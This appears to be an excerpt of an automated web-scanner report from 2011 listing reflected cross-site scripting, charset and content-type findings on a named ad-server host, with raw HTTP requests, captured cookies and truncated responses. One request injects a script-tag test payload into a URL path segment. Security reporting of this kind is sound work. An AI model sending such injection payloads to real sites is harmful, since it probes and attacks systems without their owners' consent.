1. Cross-site scripting (reflected)
1.1. http://premium.mookie1.com/2/PAM_DM/2011Generic@Bottom3 [REST URL parameter 2]
1.2. http://premium.mookie1.com/2/PAM_DM/2011Generic@Bottom3 [REST URL parameter 3]
2. HTML does not specify charset
3. Content type incorrectly stated
Severity: | High |
Confidence: | Certain |
Host: | http://premium.mookie1 |
Path: | /2/PAM_DM/2011Generic |
GET /2/PAM_DM66c27"><script>alert(1)< Host: premium.mookie1.com Proxy-Connection: keep-alive Referer: http://b3.mookie1.com/2 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1 Accept: text/html,application Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: OAX=Mhd7ak4m6x4ADQFu; RMFL=011Qre3qU10DsA; RMFM=011QsyqkU10MEI; dlx_20100929=set; other_20110126=set; id=211111708350353; mdata=1|211111708350353 |
HTTP/1.1 200 OK Date: Thu, 18 Aug 2011 13:52:10 GMT Server: Apache/2.2.3 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p Content-Length: 347 Content-Type: text/html <A HREF="http://premium ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://premium.mookie1 |
Path: | /2/PAM_DM/2011Generic |
GET /2/PAM_DM/2011Generic Host: premium.mookie1.com Proxy-Connection: keep-alive Referer: http://b3.mookie1.com/2 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1 Accept: text/html,application Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: OAX=Mhd7ak4m6x4ADQFu; RMFL=011Qre3qU10DsA; RMFM=011QsyqkU10MEI; dlx_20100929=set; other_20110126=set; id=211111708350353; mdata=1|211111708350353 |
HTTP/1.1 200 OK Date: Thu, 18 Aug 2011 13:52:13 GMT Server: Apache/2.2.3 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p Content-Length: 338 Content-Type: text/html <A HREF="http://premium ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://premium.mookie1 |
Path: | /2/PAM_DM/2011Generic |
GET /2/PAM_DM/2011Generic Host: premium.mookie1.com Proxy-Connection: keep-alive Referer: http://b3.mookie1.com/2 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1 Accept: text/html,application Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: OAX=Mhd7ak4m6x4ADQFu; RMFL=011Qre3qU10DsA; RMFM=011QsyqkU10MEI; dlx_20100929=set; other_20110126=set; id=211111708350353; mdata=1|211111708350353 |
HTTP/1.1 200 OK Date: Thu, 18 Aug 2011 13:51:40 GMT Server: Apache/2.2.3 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p Content-Length: 303 Content-Type: text/html <A HREF="http://premium ...[SNIP]... |
Severity: | Information |
Confidence: | Firm |
Host: | http://premium.mookie1 |
Path: | /favicon.ico |
GET /favicon.ico HTTP/1.1 Host: premium.mookie1.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: image/png,image/*;q=0.8,* Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Keep-Alive: 115 Proxy-Connection: keep-alive Cookie: id=2040695539456590; OAX=Mhd7ak45SYsADCcs; RMFL=011QqFEqU103Xq |
HTTP/1.1 200 OK Date: Thu, 18 Aug 2011 13:57:09 GMT Server: Apache/2.2.3 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p Last-Modified: Wed, 13 Oct 2010 18:42:29 GMT ETag: "2000223-1cee-49283f Accept-Ranges: bytes Content-Length: 7406 Content-Type: text/plain ..............h...6... ..............00......... ...[SNIP]... |